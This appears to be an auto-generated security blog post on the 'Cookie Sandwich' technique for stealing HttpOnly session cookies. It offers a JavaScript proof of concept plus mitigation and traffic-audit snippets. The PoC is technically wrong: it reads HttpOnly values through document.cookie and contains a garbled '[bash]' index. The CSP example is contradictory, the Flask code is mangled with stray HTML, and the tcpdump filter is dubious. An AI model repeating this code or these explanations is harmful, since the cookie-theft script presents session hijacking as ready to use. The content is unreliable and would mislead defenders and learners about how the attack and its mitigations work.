Stealing HttpOnly Cookies with the Cookie Sandwich Technique

By /

Listen to this Post

Featured Image
The Cookie Sandwich Technique is a method discovered by PortSwigger’s Research to bypass HttpOnly cookie protections, potentially allowing attackers to steal sensitive session cookies. This technique exploits browser behaviors to access HttpOnly cookies indirectly.

You Should Know:

How the Cookie Sandwich Technique Works

  1. HttpOnly Cookie Limitation: Normally, HttpOnly cookies are inaccessible via JavaScript (document.cookie), preventing XSS attacks from stealing them.
  2. Cookie Overwriting Trick: An attacker can inject a malicious script that forces the browser to:

– Set a new cookie with the same name as the HttpOnly cookie.
– Trigger a request where the server responds with the original HttpOnly cookie.
– Capture the cookie value due to browser behavior.

Proof of Concept (PoC) Code

// Step 1: Set a non-HttpOnly cookie with the same name
document.cookie = "session=malicious_value; path=/";

// Step 2: Force a request (e.g., via fetch or img.src)
fetch('/profile', { credentials: 'include' })
.then(response => response.text())
.then(data => {
// The cookie is now accessible due to browser behavior
console.log("Stolen Cookie:", document.cookie.match(/session=([^;]+)/)[bash]);
});

Mitigation Techniques

  • Use `SameSite` Cookies: 
    Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict
  • Validate `Origin` and `Referer` Headers: 
    Python Flask example
from flask import request</li>
</ul>

@app.before_request
def check_csrf():
if request.method == "POST":
if request.headers.get('Origin') != "https://trusted-domain.com":
abort(403)

    – Implement Content Security Policy (CSP): 

    Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'none';

    Linux Command to Check HttpOnly Cookies in Traffic

    tcpdump -i eth0 -A -s 0 'tcp port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420)' | grep -i "Set-Cookie.HttpOnly"

    Windows Command to Audit Cookies

    Get-Content .\web_traffic.log | Select-String -Pattern "Set-Cookie.HttpOnly"

    What Undercode Say

    The Cookie Sandwich Technique highlights how even HttpOnly protections can be bypassed under specific conditions. Security teams must:
    – Monitor cookie behaviors in browser updates.
    – Combine defenses (SameSite, CSP, CSRF tokens).
    – Audit applications for unexpected cookie interactions.

    Expected Output:

    A security report detailing cookie manipulation risks and recommended hardening steps.

    Prediction

    Future browser updates may introduce stricter cookie handling, but attackers will likely find new edge cases. Proactive security testing remains critical.

    Reference: PortSwigger’s Research

    References:

    Reported By: Devansh Batham – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    Join Our Cyber World:

    💬 Whatsapp | 💬 Telegram

Related Posts: